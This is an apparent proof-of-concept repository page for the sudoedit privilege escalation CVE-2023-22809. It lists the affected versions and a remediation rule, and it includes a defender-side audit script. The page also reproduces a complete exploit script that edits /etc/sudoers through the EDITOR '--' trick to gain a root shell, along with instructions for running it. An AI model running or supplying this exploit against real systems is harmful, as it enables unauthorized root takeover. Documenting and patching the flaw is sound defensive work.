Awesome-POC/操作系统漏洞/Linux sudo权限提升漏洞 CVE-2023-22809.md
2023-06-01 17:24:55 +08:00


# Linux Sudo Privilege Escalation Vulnerability CVE-2023-22809
## Vulnerability Description
Sudo contains a privilege escalation vulnerability: an attacker can obtain root privileges on the server with a specially crafted payload.
The sudoedit component of Sudo mishandles extra arguments passed in user-supplied environment variables (`SUDO_EDITOR`, `VISUAL` and `EDITOR`). When the user-specified editor string contains a `--` argument, which bypasses the sudoers policy, a local attacker with sudoedit access can append arbitrary entries to the list of files to be processed and ultimately escalate privileges on the target system. The vulnerability also affects some QNAP operating systems (QTS, QuTS hero, QuTScloud, and QVP (QVR Pro appliances)).
## Affected Versions
```
Sudo:
1.8.0 through 1.9.12p1 are all affected
QTS and QuTS hero:
QTS < 5.0.1.2346 build 20230322
QuTS hero < h5.0.1.2348 build 20230324
```
## Proof of Concept
exp.sh
```
#!/usr/bin/env bash
#
# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
#
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Running this exploit on a vulnerable system allows a local attacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then
echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
fi
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0
```
Check the locally installed sudo version:
```
sudo -V
```
Run the script:
```
./exp.sh
```
## Remediation
When sudoedit is in use, add the affected environment variables to the `env_delete` deny list, for example:
```
Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
Cmnd_Alias SUDOEDIT = sudoedit /etc/custom/service.conf
user ALL=(ALL:ALL) SUDOEDIT
```
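As an added, defender-side example (not code from the original page or from the sudo project), the following bash script tells you whether a host needs attention for this CVE. It checks a sudo version string, either bare or as printed on the first line of `sudo -V`, against the affected range stated above (1.8.0 through 1.9.12p1), and it inspects a sudoers file for an `env_delete` rule that strips `SUDO_EDITOR`, `VISUAL` and `EDITOR`, accepting both plain `Defaults` and the per-command `Defaults!ALIAS` form shown in the remediation. The script name `audit_sudo.sh`, the function names and the `--live` flag are assumptions of this example.

```bash
#!/usr/bin/env bash
# audit_sudo.sh (hypothetical name): defender-side checks for CVE-2023-22809.
# Added example, not part of the original page or of the sudo project.
#   1. sudo_version_affected     - is a sudo version inside 1.8.0 .. 1.9.12p1?
#   2. sudoers_strips_editor_env - does a sudoers file carry an env_delete
#      rule that removes SUDO_EDITOR, VISUAL and EDITOR?

# Turn "1.9.12p1" or the first line of `sudo -V` ("Sudo version 1.9.12p1")
# into one comparable integer: major, then minor, patch and pN, three digits
# each. A version without a "pN" suffix counts as p0.
sudo_version_key() {
    local ver="$1" major minor patch p
    ver="${ver#"Sudo version "}"
    major="${ver%%.*}"; ver="${ver#*.}"
    minor="${ver%%.*}"; ver="${ver#*.}"
    patch="${ver%%p*}"
    if [[ "$ver" == *p* ]]; then p="${ver#*p}"; else p=0; fi
    printf '%d%03d%03d%03d\n' "$major" "$minor" "$patch" "$p"
}

# Exit status 0 when the version lies in the affected range given on this page.
sudo_version_affected() {
    local key lo hi
    key=$(sudo_version_key "$1")
    lo=$(sudo_version_key "1.8.0")
    hi=$(sudo_version_key "1.9.12p1")
    (( key >= lo && key <= hi ))
}

# Exit status 0 when the sudoers file in $1 has a Defaults line (plain
# "Defaults" or the per-command "Defaults!ALIAS" form) whose env_delete list
# names all three editor variables. Comments are stripped before matching.
sudoers_strips_editor_env() {
    local re='^[[:space:]]*Defaults[^[:space:]]*[[:space:]]+env_delete[[:space:]]*[+]?=[[:space:]]*"?([^"]*)"?'
    local line list var missing
    while IFS= read -r line || [[ -n "$line" ]]; do
        line="${line%%#*}"
        [[ "$line" =~ $re ]] || continue
        list="${BASH_REMATCH[1]}"
        missing=0
        for var in SUDO_EDITOR VISUAL EDITOR; do
            [[ " $list " == *" $var "* ]] || missing=1
        done
        if (( missing == 0 )); then return 0; fi
    done < "$1"
    return 1
}

# Live check on the current host (run as: ./audit_sudo.sh --live).
# Reading /etc/sudoers needs root; @include'd files are not followed here.
if [[ "${1:-}" == "--live" ]]; then
    ver=$(sudo -V | head -1)
    if sudo_version_affected "$ver"; then
        echo "AFFECTED: $ver (upgrade, or add the env_delete rule)"
    else
        echo "not in the affected range: $ver"
    fi
    if sudoers_strips_editor_env /etc/sudoers; then
        echo "sudoers strips SUDO_EDITOR/VISUAL/EDITOR"
    else
        echo "no env_delete rule for SUDO_EDITOR/VISUAL/EDITOR in /etc/sudoers"
    fi
fi
```

Validate an edited policy with `visudo -c -f <file>` before installing it; the matcher above is deliberately simpler than sudo's own parser and does not follow `@include` or `#include` directives, so files under `/etc/sudoers.d` have to be checked one by one. The upstream fix shipped in sudo 1.9.12p2, so the `env_delete` rule is the mitigation for hosts that cannot be upgraded yet.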